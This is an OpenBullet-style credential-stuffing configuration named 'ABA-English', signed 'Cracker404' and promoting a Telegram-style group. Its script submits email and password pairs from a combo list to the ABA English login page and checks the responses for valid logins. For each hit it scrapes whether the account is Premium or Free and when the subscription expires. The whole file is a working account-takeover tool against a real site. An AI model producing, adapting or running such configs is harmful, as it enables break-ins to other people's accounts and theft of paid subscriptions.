[SETTINGS]
{
  "Name": "ABA-English",
  "SuggestedBots": 180,
  "MaxCPM": 0,
  "LastModified": "2021-04-23T04:06:33.7642084+00:00",
  "AdditionalInfo": "Join @AceCorps",
  "Author": "Cracker404",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "EmailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Post REQUEST POST "https://campus.abaenglish.com/en/login" 
  CONTENT "LoginForm%5Bemail%5D=<USER>&LoginForm%5Bpassword%5D=<PASS>&yt0=Log+in&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "origin: https://campus.abaenglish.com" 
  HEADER "referer: https://campus.abaenglish.com/en/login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The email address is incorrect" 
    KEY "The password is incorrect" 
  KEYCHAIN Success OR 
    KEY "TestSpeakmvpacademy@abaenglish.com" 
    KEY "userType:\"2\"," 

#Get REQUEST GET "https://campus.abaenglish.com/academyProfile/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"ProfileForm_userType\" type=\"text\" value=\"Premium\" />" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"ProfileForm_userType\" type=\"text\" value=\"Free\" /> " 

PARSE "<SOURCE>" LR "\"ProfileForm[userType]\" id=\"ProfileForm_userType\" type=\"text\" value=\"" "\" />" CreateEmpty=FALSE -> CAP "Subscription" 

PARSE "<SOURCE>" LR "Fecha fin Premium:" "\" />" -> VAR "E" 

FUNCTION Replace "<input type=\"text\" readonly=\"readonly\" value=\"" "" "<E>" -> VAR "Expiry" 

FUNCTION Replace "</label>" "" "<Expiry>" -> CAP "Expiry" 

FUNCTION Constant "Cracker404" -> CAP "Config By" 

